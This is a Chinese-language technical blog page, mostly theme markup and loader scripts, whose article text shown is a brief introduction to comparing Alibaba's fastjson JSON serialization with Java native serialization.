<!DOCTYPE html>
<html lang="en">
    <!-- title -->


    

<!-- keywords -->



<head>
    <meta name="referrer" content="no-referrer">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="author" content="azraelxuemo">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="azraelxuemo">
    
        <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="">
    <meta name="description" content="fastjson 是阿里巴巴的开源 JSON 解析库，它可以解析 JSON 格式的字符串，支持将 Java Bean 序列化为 JSON 字符串，也可以从 JSON 字符串反序列化到 JavaBean。fastjson有很多的分析文章，我这里从一个不同的角度来看fastjson对fastjson有一点了解的同学都知道，fastjson可以把对象变成json字符串，也可以把json字符串再转化为对象">
<meta property="og:type" content="article">
<meta property="og:title" content="fastjson序列化">
<meta property="og:url" content="https://azraelxuemo.github.io/2023/12/11/fastjson%E5%BA%8F%E5%88%97%E5%8C%96/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="fastjson 是阿里巴巴的开源 JSON 解析库，它可以解析 JSON 格式的字符串，支持将 Java Bean 序列化为 JSON 字符串，也可以从 JSON 字符串反序列化到 JavaBean。fastjson有很多的分析文章，我这里从一个不同的角度来看fastjson对fastjson有一点了解的同学都知道，fastjson可以把对象变成json字符串，也可以把json字符串再转化为对象">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701508309233-e7da84b1-57e7-43f6-a500-56c58a930e72.png#averageHue=%232b2e35&clientId=ue1d751fb-8fb7-4&from=drop&id=u3a908808&originHeight=596&originWidth=1138&originalType=binary&ratio=2&rotation=0&showTitle=false&size=487620&status=done&style=none&taskId=u713e99df-4a24-4229-a3b0-35777018a10&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701654001759-05a34402-9fa5-487a-a928-94aacf6ae3c3.png#averageHue=%232a2e36&clientId=uebb5a96d-c261-4&from=drop&id=u8ecca07b&originHeight=490&originWidth=1186&originalType=binary&ratio=2&rotation=0&showTitle=false&size=399475&status=done&style=none&taskId=ub6555a5d-3f24-403d-8275-6164327adbf&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701513902052-9f2bce80-560e-4686-9fbe-1c6e696122dd.png#averageHue=%23313339&clientId=ue1d751fb-8fb7-4&from=drop&id=ue515f4b8&originHeight=322&originWidth=758&originalType=binary&ratio=2&rotation=0&showTitle=false&size=204032&status=done&style=none&taskId=u51cf7a69-a382-49d0-a2c4-23ea9c0991d&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702296665465-52b810b3-f455-4a5a-8cb3-08433eccf365.png#averageHue=%23232427&clientId=ude7c4384-affb-4&from=drop&id=u12b9b0ca&originHeight=522&originWidth=1324&originalType=binary&ratio=2&rotation=0&showTitle=false&size=467292&status=done&style=none&taskId=uf7eba0d2-d638-4a71-bb50-740a2df24c1&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701513949372-f2cf4636-2a81-4aa5-a4fa-940423299632.png#averageHue=%23232427&clientId=ue1d751fb-8fb7-4&from=drop&id=u68540e88&originHeight=332&originWidth=1124&originalType=binary&ratio=2&rotation=0&showTitle=false&size=231114&status=done&style=none&taskId=u288ad26a-9582-4087-b512-97a12bc76dc&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701514038337-b2d333ef-9da2-40a4-98a2-eb76be64288c.png#averageHue=%232e2f33&clientId=ue1d751fb-8fb7-4&from=drop&id=u37b3ddb5&originHeight=110&originWidth=850&originalType=binary&ratio=2&rotation=0&showTitle=false&size=68578&status=done&style=none&taskId=udc354f59-5876-4f87-a836-ceced26452d&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1699665946964-0eeb7536-c8fd-4018-9953-52ba758bbe9d.png#averageHue=%232d2e32&clientId=u47e58005-1321-4&from=drop&id=oFetT&originHeight=144&originWidth=1632&originalType=binary&ratio=2&rotation=0&showTitle=false&size=186718&status=done&style=none&taskId=u221fdd32-522f-495b-8fb6-73848e8c1f1&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701564831784-7788f9d2-1d42-45f3-a580-fe313947b81d.png#averageHue=%2327282c&clientId=ubd959d35-4a9e-4&from=drop&id=u436dd705&originHeight=738&originWidth=1468&originalType=binary&ratio=2&rotation=0&showTitle=false&size=668418&status=done&style=none&taskId=u14eeb9ad-4803-4943-8948-04fa77113e5&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1699687423734-1fa5e83d-0964-48ab-9d91-5497cdbdf053.png#averageHue=%23323844&clientId=u57e60602-fbb9-4&from=drop&id=TROc3&originHeight=230&originWidth=1114&originalType=binary&ratio=2&rotation=0&showTitle=false&size=206750&status=done&style=none&taskId=u37073922-d8b7-4960-9ef6-c5cb8e8eb89&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701564355081-2182ed17-a47d-41db-b6ac-2f2932453777.png#averageHue=%23313b50&clientId=ubd959d35-4a9e-4&from=drop&id=u4dbf6b2a&originHeight=122&originWidth=1542&originalType=binary&ratio=2&rotation=0&showTitle=false&size=127961&status=done&style=none&taskId=u5c059e86-eafc-440c-9aab-a8ad66f2821&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701564403925-cdf25913-2421-4731-baa1-f3735613d415.png#averageHue=%2337393d&clientId=ubd959d35-4a9e-4&from=drop&id=ub1220df3&originHeight=380&originWidth=916&originalType=binary&ratio=2&rotation=0&showTitle=false&size=280256&status=done&style=none&taskId=ue5bc823c-6352-4321-ac0e-dcbe91708b7&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701564508167-880b027c-e4da-4b69-b383-6dfa2b43e57d.png#averageHue=%2334373a&clientId=ubd959d35-4a9e-4&from=drop&id=u5034789c&originHeight=400&originWidth=942&originalType=binary&ratio=2&rotation=0&showTitle=false&size=282545&status=done&style=none&taskId=u46584135-d221-4c10-b95b-eb217b9f20a&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701588438277-4b90e6d0-d741-4beb-9bb6-7926dd9bb4e2.png#averageHue=%2337393c&clientId=ubd959d35-4a9e-4&from=drop&id=u79336deb&originHeight=192&originWidth=976&originalType=binary&ratio=2&rotation=0&showTitle=false&size=144273&status=done&style=none&taskId=uda0c9fc4-9c6b-4e99-a894-a00b48195ec&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701568165705-2d0d845e-04f9-439e-8b3e-9a175b48629d.png#averageHue=%232c3039&clientId=ubd959d35-4a9e-4&from=drop&id=ue13ac271&originHeight=204&originWidth=880&originalType=binary&ratio=2&rotation=0&showTitle=false&size=131521&status=done&style=none&taskId=u121ebd40-6076-4df5-9378-d7598a47c67&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701568203646-96ccb699-d61e-40ed-82cc-c83d8c9b67a5.png#averageHue=%232c313d&clientId=ubd959d35-4a9e-4&from=drop&id=u6ea3b458&originHeight=264&originWidth=1700&originalType=binary&ratio=2&rotation=0&showTitle=false&size=293136&status=done&style=none&taskId=u709251c9-dc9b-4485-b56b-e16160a6aaa&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701570720303-d61fe907-23ea-4fc7-9fee-ae607f743ad8.png#averageHue=%2335373b&clientId=ubd959d35-4a9e-4&from=drop&id=u69348880&originHeight=342&originWidth=870&originalType=binary&ratio=2&rotation=0&showTitle=false&size=226876&status=done&style=none&taskId=u0e964a17-efcb-4b13-9145-955687ac024&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702431519233-f4c6954d-f071-42d4-8565-ecc6f3d3887a.png#averageHue=%23222326&clientId=udb71fb31-d230-4&from=drop&id=u31c67672&originHeight=598&originWidth=1284&originalType=binary&ratio=2&rotation=0&showTitle=false&size=449613&status=done&style=none&taskId=ub758a5c9-b433-4a21-8065-f17ff332817&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701587059285-8e3f6737-9529-44c5-8c7f-938529d2b725.png#averageHue=%232e323a&clientId=ubd959d35-4a9e-4&from=drop&id=u44911623&originHeight=104&originWidth=830&originalType=binary&ratio=2&rotation=0&showTitle=false&size=76097&status=done&style=none&taskId=ucc1680be-b54d-46db-9185-cccd46c252c&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701587080912-152afac2-dcdc-4a48-a4bd-4002315164e0.png#averageHue=%2327282c&clientId=ubd959d35-4a9e-4&from=drop&id=u54664ef4&originHeight=248&originWidth=1572&originalType=binary&ratio=2&rotation=0&showTitle=false&size=240363&status=done&style=none&taskId=u54e87ea2-0768-402c-8595-b92fabdc34f&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702471452099-2e52bffc-69dd-42ec-906b-df502668f4fd.png#averageHue=%23272c35&clientId=ue8a8d680-578e-4&from=drop&id=kp35b&originHeight=362&originWidth=1428&originalType=binary&ratio=2&rotation=0&showTitle=false&size=366618&status=done&style=none&taskId=u2db20dd5-f5de-4e21-a5e1-4beb4138cf5&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702471617786-ced4d710-f240-4353-ac98-c870578a7e77.png#averageHue=%23292e39&clientId=ue8a8d680-578e-4&from=drop&id=u3f156e1c&originHeight=280&originWidth=1426&originalType=binary&ratio=2&rotation=0&showTitle=false&size=304322&status=done&style=none&taskId=u6ad33f14-153b-4467-aef0-70f278a585a&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702470165687-b40233f4-d8e8-4070-ad69-c0ef8e4f72a8.png#averageHue=%232e323b&clientId=u78384bae-71f5-4&from=drop&id=u48a771e2&originHeight=210&originWidth=1824&originalType=binary&ratio=2&rotation=0&showTitle=false&size=288764&status=done&style=none&taskId=ufd612eee-d971-49eb-8cbf-8d90148d23b&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702470333156-bbab87df-8056-472d-baa5-fc530ee32fb6.png#averageHue=%2328292c&clientId=u78384bae-71f5-4&from=drop&id=uddeeccab&originHeight=284&originWidth=774&originalType=binary&ratio=2&rotation=0&showTitle=false&size=165753&status=done&style=none&taskId=u9bd35320-6e8a-4042-b083-a0ba76dc3b1&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702470891251-9d90d4de-4865-4ba7-a8e1-700e42bb2eaa.png#averageHue=%2325272a&clientId=u8815ac92-5b59-4&from=drop&id=ubf1c0992&originHeight=494&originWidth=1162&originalType=binary&ratio=2&rotation=0&showTitle=false&size=398376&status=done&style=none&taskId=u98ce2573-46d8-4d28-b30c-74705f5efa3&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702471950651-6da488f6-39d9-434a-bd43-425386dbccd9.png#averageHue=%232d2e31&clientId=ue8a8d680-578e-4&from=drop&id=u69eb685d&originHeight=136&originWidth=782&originalType=binary&ratio=2&rotation=0&showTitle=false&size=92698&status=done&style=none&taskId=u92d0c837-4049-41e5-8487-12c3ea0b628&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702472147655-ea389a94-e0d9-4276-acad-b43e06c6bbab.png#averageHue=%232b2d30&clientId=ue8a8d680-578e-4&from=drop&id=u39a7ead0&originHeight=138&originWidth=804&originalType=binary&ratio=2&rotation=0&showTitle=false&size=93600&status=done&style=none&taskId=u25859664-37d0-4aaf-978a-87ca881e8ab&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702472200932-174237e5-d8f5-45b1-97f5-03dc364b9bb8.png#averageHue=%23f9f9f9&clientId=u0fc7f195-d1ba-4&from=drop&id=u04e0bd3a&originHeight=66&originWidth=488&originalType=binary&ratio=2&rotation=0&showTitle=false&size=34943&status=done&style=none&taskId=u6daf728d-5408-4f48-af8d-cb1e8bc0b8c&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702300124899-61f8732e-7a1a-4b29-9b95-8ae4e906edf4.png#averageHue=%232a2d35&clientId=ude7c4384-affb-4&from=drop&id=ud44f9241&originHeight=476&originWidth=1142&originalType=binary&ratio=2&rotation=0&showTitle=false&size=420687&status=done&style=none&taskId=u7d9fbafb-d637-4b6d-b42c-41400417f9c&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702300261054-92dca6c7-164e-4b9f-8816-9dd5d409fe00.png#averageHue=%23303440&clientId=ude7c4384-affb-4&from=drop&id=uf96dcef1&originHeight=112&originWidth=1090&originalType=binary&ratio=2&rotation=0&showTitle=false&size=102113&status=done&style=none&taskId=u97bc98a4-bae2-4c78-b666-a4e76076a9e&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702300308970-0ce49a78-81d7-49bb-8870-12fd8bbcbf36.png#averageHue=%23304260&clientId=ude7c4384-affb-4&from=drop&id=uf7e2451c&originHeight=70&originWidth=716&originalType=binary&ratio=2&rotation=0&showTitle=false&size=47162&status=done&style=none&taskId=ub4edc03a-06e9-4407-a495-49a887d0145&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702300481559-dc3122b7-3e40-49d7-9681-491fe909bdf6.png#averageHue=%232a2f3a&clientId=ude7c4384-affb-4&from=drop&id=u4d71bf81&originHeight=292&originWidth=1624&originalType=binary&ratio=2&rotation=0&showTitle=false&size=314096&status=done&style=none&taskId=u5f3ec5b6-c003-46eb-8758-f8c698d1b95&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702348517275-dffac77e-b2ff-4192-a582-b329d766c8a9.png#averageHue=%23242528&clientId=u355dda8b-f906-4&from=drop&id=u48eb4aae&originHeight=216&originWidth=1422&originalType=binary&ratio=2&rotation=0&showTitle=false&size=210364&status=done&style=none&taskId=ua54dcb12-f9bf-461b-a921-6ea12f96beb&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702300629757-01c88b92-05cf-43b1-abd5-8274233782b4.png#averageHue=%23272c39&clientId=ude7c4384-affb-4&from=drop&id=u779fb78d&originHeight=238&originWidth=612&originalType=binary&ratio=2&rotation=0&showTitle=false&size=116254&status=done&style=none&taskId=u60a9e9ef-2740-4064-8a8e-5cbdee0cb7a&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702299898306-219fdca1-3d5c-4dfe-9252-11c4974246f1.png#averageHue=%23242529&clientId=ude7c4384-affb-4&from=drop&id=u5bfe400a&originHeight=836&originWidth=1772&originalType=binary&ratio=2&rotation=0&showTitle=false&size=886389&status=done&style=none&taskId=uedd8d55e-b3e1-47d8-bf1e-28bd2e0e108&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702301113898-60e27d3c-c5ba-4085-975a-756b4ba74dc4.png#averageHue=%2326282d&clientId=ude7c4384-affb-4&from=drop&id=u51d3ae3d&originHeight=1204&originWidth=1330&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1076715&status=done&style=none&taskId=u89baf4d8-c04b-44a6-abf7-7c6f45eebbb&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702472812328-1d7996e9-0656-4bfd-84dd-fb8d946dc46e.png#averageHue=%23334160&clientId=u0fc7f195-d1ba-4&from=drop&id=u88390841&originHeight=78&originWidth=720&originalType=binary&ratio=2&rotation=0&showTitle=false&size=51082&status=done&style=none&taskId=u5de80f43-da33-49ca-bdd2-727819d5b43&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702473034420-6aac5ba6-9582-47f3-87bf-cf65769ba2d6.png#averageHue=%2327282c&clientId=u0fc7f195-d1ba-4&from=drop&id=u70966902&originHeight=1072&originWidth=1412&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1077857&status=done&style=none&taskId=u1adc9aee-82e3-4883-b573-18241c0ac4e&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702301484512-254e7453-f4d9-474c-b074-b1031beaa1e2.png#averageHue=%232f3135&clientId=ude7c4384-affb-4&from=drop&id=u99d1d337&originHeight=434&originWidth=816&originalType=binary&ratio=2&rotation=0&showTitle=false&size=258707&status=done&style=none&taskId=u4577c45a-2990-4e50-873e-3c02cf1b3e6&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702301513886-b2e722ef-a3c7-4dd8-b85d-fc00eed290e5.png#averageHue=%2325272b&clientId=ude7c4384-affb-4&from=drop&id=u93a4f7e8&originHeight=374&originWidth=910&originalType=binary&ratio=2&rotation=0&showTitle=false&size=240678&status=done&style=none&taskId=u070fb2a4-7ab0-4827-bb2e-16a973cd8a5&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1702301648356-d57c37b6-8c70-4441-84a5-a4d5304be277.png#averageHue=%233e3529&clientId=ude7c4384-affb-4&from=drop&id=uabada70e&originHeight=788&originWidth=974&originalType=binary&ratio=2&rotation=0&showTitle=false&size=643066&status=done&style=none&taskId=ue3006e51-9066-4b96-a85e-c8b54ee0da3&title=">
<meta property="article:published_time" content="2023-12-11T13:21:34.000Z">
<meta property="article:modified_time" content="2023-12-13T13:24:36.600Z">
<meta property="article:author" content="azraelxuemo">
<meta property="article:tag" content="java">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701508309233-e7da84b1-57e7-43f6-a500-56c58a930e72.png#averageHue=%232b2e35&clientId=ue1d751fb-8fb7-4&from=drop&id=u3a908808&originHeight=596&originWidth=1138&originalType=binary&ratio=2&rotation=0&showTitle=false&size=487620&status=done&style=none&taskId=u713e99df-4a24-4229-a3b0-35777018a10&title=">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <link rel="icon" href="/assets/favicon.ico">
    
    <title>fastjson序列化 · azraelxuemo&#39;s Studio</title>
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
    (function (w) {
        'use strict'
        // rel=preload support test
        if (!w.loadCSS) {
            w.loadCSS = function () {}
        }
        // define on the loadCSS obj
        var rp = (loadCSS.relpreload = {})
        // rel=preload feature support test
        // runs once and returns a function for compat purposes
        rp.support = (function () {
            var ret
            try {
                ret = w.document.createElement('link').relList.supports('preload')
            } catch (e) {
                ret = false
            }
            return function () {
                return ret
            }
        })()

        // if preload isn't supported, get an asynchronous load by using a non-matching media attribute
        // then change that media back to its intended value on load
        rp.bindMediaToggle = function (link) {
            // remember existing media attr for ultimate state, or default to 'all'
            var finalMedia = link.media || 'all'

            function enableStylesheet() {
                link.media = finalMedia
            }

            // bind load handlers to enable media
            if (link.addEventListener) {
                link.addEventListener('load', enableStylesheet)
            } else if (link.attachEvent) {
                link.attachEvent('onload', enableStylesheet)
            }

            // Set rel and non-applicable media type to start an async request
            // note: timeout allows this to happen async to let rendering continue in IE
            setTimeout(function () {
                link.rel = 'stylesheet'
                link.media = 'only x'
            })
            // also enable media after 3 seconds,
            // which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
            setTimeout(enableStylesheet, 3000)
        }

        // loop through link elements in DOM
        rp.poly = function () {
            // double check this to prevent external calls from running
            if (rp.support()) {
                return
            }
            var links = w.document.getElementsByTagName('link')
            for (var i = 0; i < links.length; i++) {
                var link = links[i]
                // qualify links to those with rel=preload and as=style attrs
                if (
                    link.rel === 'preload' &&
                    link.getAttribute('as') === 'style' &&
                    !link.getAttribute('data-loadcss')
                ) {
                    // prevent rerunning on link
                    link.setAttribute('data-loadcss', true)
                    // bind listeners to toggle media back
                    rp.bindMediaToggle(link)
                }
            }
        }

        // if unsupported, run the polyfill
        if (!rp.support()) {
            // run once at least
            rp.poly()

            // rerun poly on an interval until onload
            var run = w.setInterval(rp.poly, 500)
            if (w.addEventListener) {
                w.addEventListener('load', function () {
                    rp.poly()
                    w.clearInterval(run)
                })
            } else if (w.attachEvent) {
                w.attachEvent('onload', function () {
                    rp.poly()
                    w.clearInterval(run)
                })
            }
        }

        // commonjs
        if (typeof exports !== 'undefined') {
            exports.loadCSS = loadCSS
        } else {
            w.loadCSS = loadCSS
        }
    })(typeof global !== 'undefined' ? global : this)
</script>

    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }
</style>

    <link rel="preload" href="/css/style.css?v=20211217" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="preload" href="/css/dark.css?v=20211217" as="style">
    <link rel="stylesheet" href="/css/dark.css">
    <link rel="stylesheet" href="/css/mobile.css?v=20211217" media="(max-width: 960px)">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" as="script">
    <link rel="preload" href="/scripts/main.js?v=20211217" as="script">
    <link rel="preload" href="/scripts/dark.js?v=20211217" as="script">
    <link rel="preload" href="/font/Oswald-Regular.ttf" as="font" crossorigin>
    <link rel="preload" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" as="font" crossorigin>
    <!-- algolia -->
    
    <!-- 百度统计  -->
    
    <!-- Google tag (gtag.js) -->
    

<meta name="generator" content="Hexo 7.0.0"></head>

    <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ == undefined) {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js" />')
        }
    </script>
    
        <body class="post-body">
    
        <!-- header -->
        <header class="header header-mobile">
    <!-- top read progress line -->
    <div class="header-element">
        <div class="read-progress"></div>
    </div>
    <!-- sidebar menu button -->
    <div class="header-element">
        
            <div class="header-sidebar-menu">
        
            
                <div style="padding-left: 1px;">&#xe775;</div>
            
        </div>
    </div>
    <!-- header actions -->
    <div class="header-actions">
        <!-- theme mode switch button -->
        <span class="header-theme-btn header-element">
            <i class="fas fa-adjust"></i>
        </span>
        <!-- back to home page text -->
        <span class="home-link header-element">
            <a href=/>azraelxuemo's Studio.</a>
        </span>
    </div>
    <!-- toggle banner for post layout -->
    
        
            <div class="banner">
        
            <div class="blog-title header-element">
                <a href="/">azraelxuemo&#39;s Studio.</a>
            </div>
            <div class="post-title header-element">
                <a href="#" class="post-name">fastjson序列化</a>
            </div>
        </div>
    
</header>

        <!-- fixed footer -->
        <footer class="footer-fixed">
    <!-- back to top button -->
    <div class="footer-fixed-element">
        
            <div class="back-top back-top-hidden">
        
        
            <div>&#xe639;</div>
        
        </div>
    </div>
</footer>

        <!-- wrapper -->
        <div class="wrapper">
            <div class="site-intro" style="







    height:50vh;

">
    
    <!-- 主页  -->
    
        
    <!-- 404页  -->
    
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
                fastjson序列化
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
                
            <!-- 404 -->
            
        </p>
        <!-- 文章页 meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class= post-intro-tags >
    
    
        <a class="post-tag" href="javascript:void(0);" data-tags="java">java</a>
    
</div>

                
                <!-- 文章字数统计 -->
                
                <div class="post-intro-meta">
                    <!-- 撰写日期 -->
                    <span class="iconfont-archer post-intro-calander">&#xe676;</span>
                    <span class="post-intro-time">2023/12/11</span>
                    <!-- busuanzi -->
                    
                        <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                            <span class="iconfont-archer post-intro-busuanzi">&#xe602;</span>
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    
                    <!-- 文章分享 -->
                    <span class="share-wrapper">
                        <span class="iconfont-archer share-icon">&#xe71d;</span>
                        <span class="share-text">Share</span>
                        <ul class="share-list">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>

            <script>
  // get user agent
  function getBrowserVersions() {
    var u = window.navigator.userAgent
    return {
      userAgent: u,
      trident: u.indexOf('Trident') > -1, //IE内核
      presto: u.indexOf('Presto') > -1, //opera内核
      webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
      gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
      mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
      ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
      android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
      iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
      iPad: u.indexOf('iPad') > -1, //是否为iPad
      webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
      weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
      uc: u.indexOf('UCBrowser') > -1, //是否为android下的UC浏览器
    }
  }
  var browser = {
    versions: getBrowserVersions(),
  }
  console.log('userAgent: ' + browser.versions.userAgent)

  // callback
  function fontLoaded() {
    console.log('font loaded')
    if (document.getElementsByClassName('site-intro-meta')) {
      document
        .getElementsByClassName('intro-title')[0]
        .classList.add('intro-fade-in')
      document
        .getElementsByClassName('intro-subtitle')[0]
        .classList.add('intro-fade-in')
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in')
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb() {
    if (browser.versions.uc) {
      console.log('UCBrowser')
      fontLoaded()
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular'],
        },
        loading: function () {
          // 所有字体开始加载
          // console.log('font loading');
        },
        active: function () {
          // 所有字体已渲染
          fontLoaded()
        },
        inactive: function () {
          // 字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout')
          fontLoaded()
        },
        timeout: 5000, // Set the timeout to two seconds
      })
    }
  }

  function asyncErr() {
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document,
      t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0]
    o.src = u
    if (cb) {
      o.addEventListener(
        'load',
        function (e) {
          cb(null, e)
        },
        false
      )
    }
    if (err) {
      o.addEventListener(
        'error',
        function (e) {
          err(null, e)
        },
        false
      )
    }
    s.parentNode.insertBefore(o, s)
  }

  var asyncLoadWithFallBack = function (arr, success, reject) {
    var currReject = function () {
      reject()
      arr.shift()
      if (arr.length) async(arr[0], success, currReject)
    }

    async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack(
    [
      'https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js',
      'https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js',
      "/lib/webfontloader.min.js",
    ],
    asyncCb,
    asyncErr
  )
</script>

            <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
            <div class="container container-unloaded">
                <main class="main post-page">
    <article class="article-entry">
        <p>fastjson 是阿里巴巴的开源 JSON 解析库，它可以解析 JSON 格式的字符串，支持将 Java Bean 序列化为 JSON 字符串，也可以从 JSON 字符串反序列化到 JavaBean。<br>fastjson有很多的分析文章，我这里从一个不同的角度来看fastjson<br>对fastjson有一点了解的同学都知道，fastjson可以把对象变成json字符串，也可以把json字符串再转化为对象，这个过程其实很类似于java原生序列化\反序列化，只不过我们的输出流从java自定义的格式变成了json格式，那么我觉得可以从这两个相似机制的对比入手，能够让大家了解到fastjson一些比较关键的流程。</p>
